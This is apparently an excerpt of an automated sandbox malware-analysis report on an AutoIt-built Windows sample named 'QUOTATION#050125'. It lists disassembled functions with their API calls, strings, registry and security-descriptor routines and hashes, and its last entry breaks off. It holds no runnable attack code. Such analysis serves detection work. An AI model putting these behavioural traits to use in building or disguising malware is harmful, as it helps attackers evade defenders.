CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00502A77
GetStockObject.GDI32(00000011), ref: 00502A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00502A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00502A97

Strings

static, xrefs: 0050294F, 00502A71
AutoIt v3, xrefs: 005028F8
DISPLAY, xrefs: 0050295A
msctls_progress32, xrefs: 00502A13

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: f4f6c00bdf614ee3404bf2b59a3c804605eb73e8e254554437d1534cc07bb5cc
Instruction ID: cc697200209e32533df9867215079d66e7e3fc741bede6cfddd12f0d2a7c5669
Opcode Fuzzy Hash: f4f6c00bdf614ee3404bf2b59a3c804605eb73e8e254554437d1534cc07bb5cc
Instruction Fuzzy Hash: 91B17AB1A40205AFEB10DFA8CC59FAE7BA9FB08714F008519F915EB2D0D774AD00CBA4

Function 004F4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004F4AED
GetDriveTypeW.KERNEL32(?,0051CB68,?,\\.\,0051CC08), ref: 004F4BCA
SetErrorMode.KERNEL32(00000000,0051CB68,?,\\.\,0051CC08), ref: 004F4D36

Strings

Fixed, xrefs: 004F4C09
SSA, xrefs: 004F4CA6
iSCSI, xrefs: 004F4CC2
Network, xrefs: 004F4C02
Unknown, xrefs: 004F4BED, 004F4C83
SCSI, xrefs: 004F4C8A
ATA, xrefs: 004F4C98
SATA, xrefs: 004F4CD0
SSD, xrefs: 004F4C4A
FileBackedVirtual, xrefs: 004F4CEC
Fibre, xrefs: 004F4CAD
\\.\, xrefs: 004F4B3F
CDROM, xrefs: 004F4BFB
RAID, xrefs: 004F4CBB
USB, xrefs: 004F4CB4
ATAPI, xrefs: 004F4C91
Virtual, xrefs: 004F4CE5
Removable, xrefs: 004F4C10, 004F4C15
SAS, xrefs: 004F4CC9
1394, xrefs: 004F4C9F
RAMDisk, xrefs: 004F4BF4
PhysicalDrive, xrefs: 004F4B76
MMC, xrefs: 004F4CDE

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 0cc71fd6da7ebfbf9d1620877b5d904894a381ebad2a0fa93b7149fe473d6984
Instruction ID: 77459dd6345fc626c7af4865e573bc1f953c09588abe4a50a9d8eee0755f5ac8
Opcode Fuzzy Hash: 0cc71fd6da7ebfbf9d1620877b5d904894a381ebad2a0fa93b7149fe473d6984
Instruction Fuzzy Hash: 9D61E43064124D9BCB04DF14C981ABF7BA0BB85718B25441BFA06AB651CF3DED42DB6B

Function 005173E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00517421
SetTextColor.GDI32(?,?), ref: 00517425
GetSysColorBrush.USER32(0000000F), ref: 0051743B
GetSysColor.USER32(0000000F), ref: 00517446
CreateSolidBrush.GDI32(?), ref: 0051744B
GetSysColor.USER32(00000011), ref: 00517463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00517471
SelectObject.GDI32(?,00000000), ref: 00517482
SetBkColor.GDI32(?,00000000), ref: 0051748B
SelectObject.GDI32(?,?), ref: 00517498
InflateRect.USER32(?,000000FF,000000FF), ref: 005174B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005174CE
GetWindowLongW.USER32(00000000,000000F0), ref: 005174DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0051752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00517554
InflateRect.USER32(?,000000FD,000000FD), ref: 00517572
DrawFocusRect.USER32(?,?), ref: 0051757D
GetSysColor.USER32(00000011), ref: 0051758E
SetTextColor.GDI32(?,00000000), ref: 00517596
DrawTextW.USER32(?,005170F5,000000FF,?,00000000), ref: 005175A8
SelectObject.GDI32(?,?), ref: 005175BF
DeleteObject.GDI32(?), ref: 005175CA
SelectObject.GDI32(?,?), ref: 005175D0
DeleteObject.GDI32(?), ref: 005175D5
SetTextColor.GDI32(?,?), ref: 005175DB
SetBkColor.GDI32(?,?), ref: 005175E5

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 1931f5ae3fb76bae9b53d928c9b874c5b40275e369053a8083b8ef8ebeb1cd18
Instruction ID: 882ead33b863d6d55ccb597e3503e447215292b6d321ec507516af9204bebf40
Opcode Fuzzy Hash: 1931f5ae3fb76bae9b53d928c9b874c5b40275e369053a8083b8ef8ebeb1cd18
Instruction Fuzzy Hash: 0B616D72980218BFEF019FA8DC49EEE7FB9FB08320F118515F911AB2A1D7759940DB90

Function 00510FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00511128
GetDesktopWindow.USER32 ref: 0051113D
GetWindowRect.USER32(00000000), ref: 00511144
GetWindowLongW.USER32(?,000000F0), ref: 00511199
DestroyWindow.USER32(?), ref: 005111B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005111ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0051120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0051121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00511232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00511245
IsWindowVisible.USER32(00000000), ref: 005112A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 005112BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 005112D0
GetWindowRect.USER32(00000000,?), ref: 005112E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0051130E
GetMonitorInfoW.USER32(00000000,?), ref: 00511328
CopyRect.USER32(?,?), ref: 0051133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 005113AA

Strings

(, xrefs: 0051131B
0, xrefs: 005110D3
tooltips_class32, xrefs: 005111E6

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: dd2f2a53ff882bb0e8279111ff09a123ead719f5afeb8596bd488014ab162cd9
Instruction ID: 8951a6e6eece8a891b7e6d1338a98db63c8d06ea75efacd90ba057a4c88f177d
Opcode Fuzzy Hash: dd2f2a53ff882bb0e8279111ff09a123ead719f5afeb8596bd488014ab162cd9
Instruction Fuzzy Hash: C6B16A71604741AFE700DF65C884AAEBFE4FF88354F00895DFA999B2A1C731E884CB95

Function 00498891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00498968
GetSystemMetrics.USER32(00000007), ref: 00498970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0049899B
GetSystemMetrics.USER32(00000008), ref: 004989A3
GetSystemMetrics.USER32(00000004), ref: 004989C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004989E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004989F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00498A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00498A3C
GetClientRect.USER32(00000000,000000FF), ref: 00498A5A
GetStockObject.GDI32(00000011), ref: 00498A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00498A81

Part of subcall function 0049912D: GetCursorPos.USER32(?), ref: 00499141
Part of subcall function 0049912D: ScreenToClient.USER32(00000000,?), ref: 0049915E
Part of subcall function 0049912D: GetAsyncKeyState.USER32(00000001), ref: 00499183
Part of subcall function 0049912D: GetAsyncKeyState.USER32(00000002), ref: 0049919D

SetTimer.USER32(00000000,00000000,00000028,004990FC), ref: 00498AA8

Strings

AutoIt v3 GUI, xrefs: 00498A20

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: f11b4dbd685c9f9118511346fe89975d2e26de9fac8fcb42e5c62f8855d898d7
Instruction ID: 2369a2cf80d1f1c9545b1987f06c868df83ab9805d626b0a4a4a6df5d3136486
Opcode Fuzzy Hash: f11b4dbd685c9f9118511346fe89975d2e26de9fac8fcb42e5c62f8855d898d7
Instruction Fuzzy Hash: 56B19A71A402099FDF14DFA8CC55BAE3FB5FB48314F11422AFA05AB290DB38A841DB59

Function 004E0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004E1114
Part of subcall function 004E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,004E0B9B,?,?,?), ref: 004E1120
Part of subcall function 004E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004E0B9B,?,?,?), ref: 004E112F
Part of subcall function 004E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004E0B9B,?,?,?), ref: 004E1136
Part of subcall function 004E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004E114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004E0DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004E0E29
GetLengthSid.ADVAPI32(?), ref: 004E0E40
GetAce.ADVAPI32(?,00000000,?), ref: 004E0E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004E0E96
GetLengthSid.ADVAPI32(?), ref: 004E0EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 004E0EB5
HeapAlloc.KERNEL32(00000000), ref: 004E0EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 004E0EDD
CopySid.ADVAPI32(00000000), ref: 004E0EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004E0F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004E0F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 004E0F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004E0F6E
HeapFree.KERNEL32(00000000), ref: 004E0F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004E0F7E
HeapFree.KERNEL32(00000000), ref: 004E0F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004E0F8E
HeapFree.KERNEL32(00000000), ref: 004E0F95
GetProcessHeap.KERNEL32(00000000,?), ref: 004E0FA1
HeapFree.KERNEL32(00000000), ref: 004E0FA8

Part of subcall function 004E1193: GetProcessHeap.KERNEL32(00000008,004E0BB1,?,00000000,?,004E0BB1,?), ref: 004E11A1
Part of subcall function 004E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,004E0BB1,?), ref: 004E11A8
Part of subcall function 004E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004E0BB1,?), ref: 004E11B7

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 642d2fc64c91e971af45dbb418117fc7574fcb0a167491cef2cc7fb7c1302866
Instruction ID: 5b9c5a3cbacaeaaad5cc81cad7722379c19008aa4387d4626592aae17d7e879d
Opcode Fuzzy Hash: 642d2fc64c91e971af45dbb418117fc7574fcb0a167491cef2cc7fb7c1302866
Instruction Fuzzy Hash: 8C71AE7194024AABDF209FA5DC48BEFBBB8BF08301F048116F968A6250D7B5DD55CB64

Function 00510241 Relevance: 28.4, APIs: 3, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 005102E5
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 005104C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00510504

Part of subcall function 004E223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004E2258
Part of subcall function 004E223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004E228A

Strings

SELECTCLEAR, xrefs: 0051052D
GETSELECTED, xrefs: 005105E1
SELECTALL, xrefs: 00510515
VIEWCHANGE, xrefs: 00510675
FINDITEM, xrefs: 00510627
ISSELECTED, xrefs: 005104DD
DESELECT, xrefs: 0051059C
SELECT, xrefs: 00510548
SELECTINVERT, xrefs: 0051057E
GETTEXT, xrefs: 005103EC, 00510407
GETSELECTEDCOUNT, xrefs: 00510470, 0051048B
GETITEMCOUNT, xrefs: 00510316, 00510337
GETSUBITEMCOUNT, xrefs: 00510384, 0051039F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3391685005-719923060
Opcode ID: c5ec38768658f9a3349c9540e15201922a9dbd004dc3ebe56dfe2d7b4c4eeae5
Instruction ID: d442be45187cf8904596ee62b3725caa5d040a7affab24db1bdf5012b0b63513
Opcode Fuzzy Hash: c5ec38768658f9a3349c9540e15201922a9dbd004dc3ebe56dfe2d7b4c4eeae5
Instruction Fuzzy Hash: 26E1C0312082019FDB14EF25C5908AEBBE6BFC8358B14496DF8969B2E1DB74EDC5CB41

Function 004FFE0E Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 004FFE27
LoadCursorW.USER32(00000000,00007F8A), ref: 004FFE32
LoadCursorW.USER32(00000000,00007F00), ref: 004FFE3D
LoadCursorW.USER32(00000000,00007F03), ref: 004FFE48
LoadCursorW.USER32(00000000,00007F8B), ref: 004FFE53
LoadCursorW.USER32(00000000,00007F01), ref: 004FFE5E
LoadCursorW.USER32(00000000,00007F81), ref: 004FFE69
LoadCursorW.USER32(00000000,00007F88), ref: 004FFE74
LoadCursorW.USER32(00000000,00007F80), ref: 004FFE7F
LoadCursorW.USER32(00000000,00007F86), ref: 004FFE8A
LoadCursorW.USER32(00000000,00007F83), ref: 004FFE95
LoadCursorW.USER32(00000000,00007F85), ref: 004FFEA0
LoadCursorW.USER32(00000000,00007F82), ref: 004FFEAB
LoadCursorW.USER32(00000000,00007F84), ref: 004FFEB6
LoadCursorW.USER32(00000000,00007F04), ref: 004FFEC1
LoadCursorW.USER32(00000000,00007F02), ref: 004FFECC
GetCursorInfo.USER32(?), ref: 004FFEDC
GetLastError.KERNEL32 ref: 004FFF1E

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: b9f1293f6735133aabd0aa3cd2efbaf14188ce75b1d8275228802cd567d95e52
Instruction ID: 21f630d79c296e829d4b56242da7b11020281f2396cd166a25ca80d5df3edcf0
Opcode Fuzzy Hash: b9f1293f6735133aabd0aa3cd2efbaf14188ce75b1d8275228802cd567d95e52
Instruction Fuzzy Hash: 8A4153B0D443196BDB10DFBA8C8586EBFE8FF04354B50452BE119E7281DB78A9058FA5

Function 0050C3B7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0050C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0051CC08,00000000,?,00000000,?,?), ref: 0050C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0050C5A4
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0050C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0050C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0050C84D
RegCloseKey.ADVAPI32(?), ref: 0050C881
RegCloseKey.ADVAPI32(00000000), ref: 0050C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0050C960

Strings

REG_BINARY, xrefs: 0050C913
REG_DWORD, xrefs: 0050C804
REG_EXPAND_SZ, xrefs: 0050C5CD
REG_SZ, xrefs: 0050C644
REG_MULTI_SZ, xrefs: 0050C6F5
REG_QWORD, xrefs: 0050C8C3

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Value$Close$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 492116352-966354055
Opcode ID: 2b1cff3e95065c1a2676a610fadbd123c3019a59d1fa73709626e7d64558b59d
Instruction ID: e74b17590782bbf93d0937aac58c8d3c0f160ee360cc4605c736af606d2396de
Opcode Fuzzy Hash: 2b1cff3e95065c1a2676a610fadbd123c3019a59d1fa73709626e7d64558b59d
Instruction Fuzzy Hash: D412AA352042009FCB14EF15C891A2EBBE5FF89318F14895DF85A9B7A2DB35EC41CB95

Function 004E5A1B Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 004E5A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004E5A40
SetWindowTextW.USER32(?,?), ref: 004E5A57
GetDlgItem.USER32(?,000003EA), ref: 004E5A6C
SetWindowTextW.USER32(00000000,?), ref: 004E5A72
GetDlgItem.USER32(?,000003E9), ref: 004E5A82
SetWindowTextW.USER32(00000000,?), ref: 004E5A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004E5AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004E5AC3
GetWindowRect.USER32(?,?), ref: 004E5ACC
SetWindowTextW.USER32(?,?), ref: 004E5B6F
GetDesktopWindow.USER32 ref: 004E5B75
GetWindowRect.USER32(00000000), ref: 004E5B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 004E5BD3
GetClientRect.USER32(?,?), ref: 004E5BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 004E5C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004E5C2F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 1873d426f6a0e6a073dc9b3d3d150d8d45aa41e10208ca91a128edaaf314d2df
Instruction ID: 5eecbd86a1b288697041c8619936d428891d7bb24e01abceebc48979648ecd54
Opcode Fuzzy Hash: 1873d426f6a0e6a073dc9b3d3d150d8d45aa41e10208ca91a128edaaf314d2df
Instruction Fuzzy Hash: 43719F31900B45AFDB20DFA9CE85AAFBBF5FF48709F104519E142A22A0D779F904CB54

Function 0051911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00499BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00499BB2

DragQueryPoint.SHELL32(?,?), ref: 00519147

Part of subcall function 00517674: ClientToScreen.USER32(?,?), ref: 0051769A
Part of subcall function 00517674: GetWindowRect.USER32(?,?), ref: 00517710
Part of subcall function 00517674: PtInRect.USER32(?,?,00518B89), ref: 00517720

SendMessageW.USER32(?,000000B0,?,?), ref: 005191B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005191BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 005191DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00519225
SendMessageW.USER32(?,000000B0,?,?), ref: 0051923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00519255
SendMessageW.USER32(?,000000B1,?,?), ref: 00519277
DragFinish.SHELL32(?), ref: 0051927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00519371

Strings

p#U, xrefs: 005192BB
@GUI_DRAGID, xrefs: 005192E9
@GUI_DRAGFILE, xrefs: 00519320
@GUI_DROPID, xrefs: 0051929E

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#U
API String ID: 221274066-1799915814
Opcode ID: 12cac0d46f37a71996b3a8cde7808e4c6d9e32c69ed8206979a124227124bd88
Instruction ID: e33cffa952d3c2ea037720853ef828997d796c87142eaeed7b9c2f5af8d087a3
Opcode Fuzzy Hash: 12cac0d46f37a71996b3a8cde7808e4c6d9e32c69ed8206979a124227124bd88
Instruction Fuzzy Hash: 47618771108301AFD701EF65D885DAFBFE8FF98354F00092EF592961A0DB719A48CB56

Function 004A00ED Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0055070C,00000FA0,C0E68BA6,?,?,?,?,004C23B3,000000FF), ref: 004A011C
